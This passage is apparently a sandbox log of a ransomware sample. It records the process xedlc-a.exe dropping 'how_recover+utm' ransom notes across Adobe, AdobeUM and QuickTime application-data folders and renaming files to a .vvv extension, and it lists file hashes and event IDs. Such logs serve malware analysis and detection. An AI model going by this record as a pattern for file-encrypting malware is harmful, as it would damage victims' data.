- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\Forms\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778221
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68149
- mode: created
- sequenceNumber: 801
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\Forms\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778222
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 68154
- mode: close
- sequenceNumber: 802
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\Forms\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778222
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68194
- mode: created
- sequenceNumber: 803
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\Preferences\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778223
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 68212
- mode: close
- sequenceNumber: 804
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\Preferences\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778223
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68231
- mode: created
- sequenceNumber: 805
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\Preferences\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778224
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 68237
- mode: close
- sequenceNumber: 806
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\Preferences\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778224
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68245
- mode: open
- sequenceNumber: 807
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\TMDocs.sav
- filesize: 36
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976775758
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 68260
- mode: close
- sequenceNumber: 808
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\TMDocs.sav
- filesize: 462
- md5sum: d3cb40fe6344099bc36a0a405f266e88
- sha1sum: 2d3009264bd44c228fe35e6e9e85433840ded9cf
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976775758
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68270
- mode: rename
- sequenceNumber: 809
- filesize: 462
- md5sum: d3cb40fe6344099bc36a0a405f266e88
- sha1sum: 2d3009264bd44c228fe35e6e9e85433840ded9cf
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\TMDocs.sav
- new_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\TMDocs.sav.vvv
- ads:
- fid (ads:): 281474976775758
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68279
- mode: open
- sequenceNumber: 810
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\TMGrpPrm.sav
- filesize: 690
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976775757
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 68342
- mode: close
- sequenceNumber: 811
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\TMGrpPrm.sav
- filesize: 1118
- md5sum: 72fa1df4bfa30cb18008f32b4178655e
- sha1sum: 509bb591ca63ec997964287a45bbf1c6a5516e3e
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976775757
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68352
- mode: rename
- sequenceNumber: 812
- filesize: 1118
- md5sum: 72fa1df4bfa30cb18008f32b4178655e
- sha1sum: 509bb591ca63ec997964287a45bbf1c6a5516e3e
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\TMGrpPrm.sav
- new_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\TMGrpPrm.sav.vvv
- ads:
- fid (ads:): 281474976775757
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68360
- mode: created
- sequenceNumber: 813
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778225
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 68366
- mode: close
- sequenceNumber: 814
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778225
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68372
- mode: created
- sequenceNumber: 815
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778226
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 68378
- mode: close
- sequenceNumber: 816
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778226
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 68607
- mode: created
- sequenceNumber: 817
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778227
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 68613
- mode: close
- sequenceNumber: 818
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778227
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69022
- mode: created
- sequenceNumber: 819
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778228
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 69063
- mode: close
- sequenceNumber: 820
- value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778228
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69073
- mode: created
- sequenceNumber: 821
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778229
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 69079
- mode: close
- sequenceNumber: 822
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778229
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69087
- mode: created
- sequenceNumber: 823
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778230
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 69113
- mode: close
- sequenceNumber: 824
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778230
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69121
- mode: created
- sequenceNumber: 825
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778231
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 69129
- mode: close
- sequenceNumber: 826
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778231
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69153
- mode: created
- sequenceNumber: 827
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778232
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 69160
- mode: close
- sequenceNumber: 828
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778232
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69169
- mode: created
- sequenceNumber: 829
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778233
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 69189
- mode: close
- sequenceNumber: 830
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778233
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69198
- mode: created
- sequenceNumber: 831
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778234
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 69204
- mode: close
- sequenceNumber: 832
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778234
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69214
- mode: created
- sequenceNumber: 833
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778235
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 69220
- mode: close
- sequenceNumber: 834
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778235
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69236
- mode: created
- sequenceNumber: 835
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778236
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 69296
- mode: close
- sequenceNumber: 836
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778236
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69451
- mode: created
- sequenceNumber: 837
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778237
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 69457
- mode: close
- sequenceNumber: 838
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778237
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69464
- mode: created
- sequenceNumber: 839
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778238
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 69472
- mode: close
- sequenceNumber: 840
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778238
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69628
- mode: created
- sequenceNumber: 841
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778239
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 69634
- mode: close
- sequenceNumber: 842
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778239
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69713
- mode: created
- sequenceNumber: 843
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778240
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 69724
- mode: close
- sequenceNumber: 844
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778240
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 69731
- mode: created
- sequenceNumber: 845
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778241
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 69742
- mode: close
- sequenceNumber: 846
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778241
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70066
- mode: created
- sequenceNumber: 847
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778242
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70072
- mode: close
- sequenceNumber: 848
- value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778242
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70079
- mode: created
- sequenceNumber: 849
- value: C:\Documents and Settings\admin\Application Data\Adobe\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778243
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70100
- mode: close
- sequenceNumber: 850
- value: C:\Documents and Settings\admin\Application Data\Adobe\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778243
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70283
- mode: created
- sequenceNumber: 851
- value: C:\Documents and Settings\admin\Application Data\Adobe\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778244
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70288
- mode: close
- sequenceNumber: 852
- value: C:\Documents and Settings\admin\Application Data\Adobe\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778244
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70295
- mode: created
- sequenceNumber: 853
- value: C:\Documents and Settings\admin\Application Data\AdobeUM\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778245
- ntstatus: 0x0
- CreateOptions: 0x60
- apicall:
- timestamp: 70301
- repeat: 60
- sequenceNumber: 854
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 70306
- mode: close
- sequenceNumber: 855
- value: C:\Documents and Settings\admin\Application Data\AdobeUM\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778245
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70312
- mode: created
- sequenceNumber: 856
- value: C:\Documents and Settings\admin\Application Data\AdobeUM\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778246
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70318
- mode: close
- sequenceNumber: 857
- value: C:\Documents and Settings\admin\Application Data\AdobeUM\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778246
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70325
- mode: created
- sequenceNumber: 858
- value: C:\Documents and Settings\admin\Application Data\Apple Computer\Quicktime\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778247
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70330
- mode: close
- sequenceNumber: 859
- value: C:\Documents and Settings\admin\Application Data\Apple Computer\Quicktime\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778247
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70341
- mode: created
- sequenceNumber: 860
